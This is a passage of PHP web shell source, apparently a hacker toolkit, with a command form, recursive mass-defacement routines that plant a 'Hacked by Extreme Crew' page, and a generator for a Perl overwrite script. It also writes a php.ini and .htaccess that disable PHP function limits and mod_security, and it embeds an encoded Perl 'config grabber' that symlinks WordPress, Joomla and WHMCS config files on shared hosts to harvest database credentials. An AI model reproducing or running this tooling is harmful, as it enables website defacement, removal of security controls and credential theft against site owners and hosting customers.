  546. </textarea> <tr><td colspan="2"><?php echo "$user&nbsp;>";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
  547. <?php } elseif($_GET['do'] == 'mass_deface') {
  548. function sabun_massal($dir,$namafile,$isi_script) {
  549. if(is_writable($dir)) {
  550. $dira = scandir($dir);
  551. foreach($dira as $dirb) {
  552. $dirc = "$dir/$dirb";
  553. $lokasi = $dirc.'/'.$namafile;
  554. if($dirb === '.') {
  555. file_put_contents($lokasi, $isi_script);
  556. } elseif($dirb === '..') {
  557. file_put_contents($lokasi, $isi_script);
  558. } else {
  559. if(is_dir($dirc)) {
  560. if(is_writable($dirc)) {
  561. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  562. file_put_contents($lokasi, $isi_script);
  563. $idx = sabun_massal($dirc,$namafile,$isi_script);
  564. }
  565. }
  566. }
  567. }
  568. }
  569. }
  570. function sabun_biasa($dir,$namafile,$isi_script) {
  571. if(is_writable($dir)) {
  572. $dira = scandir($dir);
  573. foreach($dira as $dirb) {
  574. $dirc = "$dir/$dirb";
  575. $lokasi = $dirc.'/'.$namafile;
  576. if($dirb === '.') {
  577. file_put_contents($lokasi, $isi_script);
  578. } elseif($dirb === '..') {
  579. file_put_contents($lokasi, $isi_script);
  580. } else {
  581. if(is_dir($dirc)) {
  582. if(is_writable($dirc)) {
  583. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  584. file_put_contents($lokasi, $isi_script);
  585. }
  586. }
  587. }
  588. }
  589. }
  590. }
  591. if($_POST['start']) {
  592. if($_POST['tipe_sabun'] == 'mahal') {
  593. echo "<div style='margin: 5px auto; padding: 5px'>";
  594. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  595. echo "</div>";
  596. } elseif($_POST['tipe_sabun'] == 'murah') {
  597. echo "<div style='margin: 5px auto; padding: 5px'>";
  598. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  599. echo "</div>";
  600. }
  601. } else {
  602. echo "<center>";
  603. echo "<form method='post'>
  604. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  605. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  606. <font style='text-decoration: underline;'>Folder:</font><br>
  607. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  608. <font style='text-decoration: underline;'>Filename:</font><br>
  609. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  610. <font style='text-decoration: underline;'>Index File:</font><br>
  611. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Extreme Crew</textarea><br>
  612. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  613. </form></center>";
  614. }
  615. } elseif($_GET['do'] == 'mass_helper'){
  616. echo "<center>";
  617. echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
  618. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
  619. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
  620. echo "<form method=POST>
  621. <help title='the file you want to put in all sites'> Def page name : </help>
  622. &nbsp;&nbsp;<input title='the file name you want to put in all sites' type=text name=index value=bie.htm>&nbsp;|
  623. <help title='your deface page's source code'>Def source code :</help>
  624. &nbsp;&nbsp;<input title='your index source code' type='text' name='source' value='index.txt'><br><br>
  625. <help>List DocumentRoot from httpd.conf : </help><br>
  626. <input type=text name=dirs size=\"40\">
  627. <br><br>
  628. <help>List ServerName from httpd.conf : </help><br>
  629. <input type=text name=sites size=\"40\">
  630. <br><br>
  631. <center><input class='but' type=submit value='Generate ' name='go'></center>
  632. </form>
  633. <br/>";
  634. echo "</center>";
  635. if($_POST['go']){
  636. echo "<b></b>";
  637. $index = $_POST['index'];
  638. $source = $_POST['source'];
  639. $dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
  640. $sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
  641.  
  642. // preparing perl script
  643.  
  644. if($_POST['dirs']){
  645.  
  646.  
  647. $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
  648. $perl_start = "#!/usr/bin/perl";
  649. $perl_end = "print\"All Defaced !\";";
  650. fwrite ($perl,$perl_start."\n\n"); // Write !!
  651.  
  652. foreach($dirs as $dir){
  653.  
  654. $result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
  655. fwrite ($perl, $result."\n");
  656. flush();
  657. }
  658. echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
  659. echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
  660. fwrite ($perl, "\n".$perl_end);
  661. fclose($perl);
  662.  
  663. }
  664. // preparing sites list
  665.  
  666. if($_POST['sites']){
  667.  
  668.  
  669. $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
  670. $sitess_start = "http://";
  671. $sitess_end = "/";
  672. fwrite ($sitess,"");
  673.  
  674. foreach($sites as $site){
  675.  
  676. $result2 = $sitess_start.@kill($site).$sitess_end.$index;
  677. fwrite ($sitess, $result2."\n");
  678. flush();
  679. }
  680. echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
  681. fwrite ($sitess,"");
  682. fclose($sitess);
  683.  
  684. }
  685. }
  686. function kill($value){ return str_replace(array("\n","\r"),"",$value); }
  687. function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
  688. function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
  689. echo "<br />";
  690. echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
  691.  
  692. } elseif($_GET['do'] == 'bypass'){
  693. echo "<center>";
  694. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  695. if(isset($_POST['ini']))
  696. {
  697. $file = fopen("php.ini","w");
  698. echo fwrite($file,"disable_functions=none
  699. safe_mode = Off
  700. ");
  701. fclose($file);
  702. echo "<a href='php.ini'>click here!</a>";
  703. } if(isset($_POST['htce']))
  704. {
  705. $file = fopen(".htaccess","w");
  706. echo fwrite($file,"<IfModule mod_security.c>
  707. SecFilterEngine Off
  708. SecFilterScanPOST Off
  709. </IfModule>
  710. ");
  711. fclose($file);
  712. echo "htaccess successfully created!";
  713. }
  714. echo"</center>";
  715. } elseif($_GET['do'] == 'convh')
  716. {
  717. @mkdir('ecboss', 0755);
  718. @chdir('ecboss');
  719. $elesem = ".htaccess";
  720. $elakab = "$elesem";
  721. $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
  722. $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
  723.  
  724. AddType application/x-httpd-cgi .ler
  725.  
  726. AddHandler cgi-script .ler
  727. AddHandler cgi-script .ler";
  728. fwrite ( $filhat , $htcont ) ;
  729. fclose ($filhat);
  730. $config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KCjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+Cjx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OwogdGV4dC1hbGlnbjogY2VudGVyOwp9Cjwvc3R5bGU+CjwvaGVhZD4KJzsKCgpwcmludCAnCjxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPgo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOwpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOwpmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7CiAgICBteSAkaXNEaXIgPSAwOwogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsKJHNpdGVzcyA9ICRfOwoKCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atc2hvcHBpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdQLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtcHJlc3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtV29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1wcm90YWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1zaXRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtbWFpbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Rlc3Qvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLXRlc3QudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvby9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW1haW4udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12YjF+Y29uZmlnLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWluY2x1ZGVzLXZiLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocDIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS13aG1jcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY3BhbmVsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdWJtaXR0aWNrZXQucGhwJywkc2l0ZXNzLictd2htY3MyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudGVzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmcudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teXNob3AvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXlzaG9wLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0